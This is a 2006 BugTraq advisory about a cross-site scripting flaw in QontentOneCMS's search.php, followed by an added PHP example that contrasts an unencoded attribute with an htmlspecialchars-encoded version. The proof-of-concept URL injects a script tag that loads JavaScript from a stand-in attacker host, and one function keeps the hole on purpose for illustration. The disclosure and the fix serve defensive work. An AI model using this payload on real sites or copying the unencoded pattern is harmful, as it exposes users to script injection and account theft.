BugTraq
QontentOneCMS v1.0 May 31 2006 03:32AM
luny youfucktard com
QontentOneCMS v1.0

homepage:

http://www.qontentone.com/

Affected files:

search.php

input forms

XSS Proof of concept:

http://www.example.com/search.php?search_phrase="><SCRIPT SRC=http://www.evilsite.com/xss.js></SCRIPT><"&search=Search
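
The leading "> in the proof of concept suggests search_phrase is echoed unencoded inside a double-quoted HTML attribute. The following is an added example, not QontentOneCMS source and not part of the original post: it assumes the value lands in the search field's value attribute, and the function names are hypothetical. It shows that pattern beside the output-encoded form.

```php
<?php
// Added example: a hypothetical reconstruction, not QontentOneCMS code.

// Encode untrusted text for an HTML text node or a quoted attribute value.
function h(string $value): string
{
    // ENT_QUOTES encodes both " and ', so the value cannot close the attribute.
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable pattern (assumed): raw parameter inside a double-quoted attribute.
function render_search_field_vulnerable(string $phrase): string
{
    return '<input type="text" name="search_phrase" value="' . $phrase . '">';
}

// Hardened: identical markup, with the value encoded at output time.
function render_search_field_hardened(string $phrase): string
{
    return '<input type="text" name="search_phrase" value="' . h($phrase) . '">';
}

// Read the parameter defensively: reject arrays (search_phrase[]=...) and missing values.
function read_search_phrase(array $query): string
{
    $raw = $query['search_phrase'] ?? '';
    return is_string($raw) ? $raw : '';
}

// Constructed input: the search_phrase value from the proof of concept above.
$query = ['search_phrase' => '"><SCRIPT SRC=http://www.evilsite.com/xss.js></SCRIPT><"'];
$phrase = read_search_phrase($query);

echo "vulnerable: ", render_search_field_vulnerable($phrase), "\n";
echo "hardened:   ", render_search_field_hardened($phrase), "\n";

// Regression check: no raw quote or angle bracket from the input survives encoding.
$encoded = h($phrase);
if (strpbrk($encoded, '"<>') !== false) {
    fwrite(STDERR, "encoding check failed\n");
    exit(1);
}
```

In a real handler, $_GET would be passed to read_search_phrase() in place of the constructed $query array.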
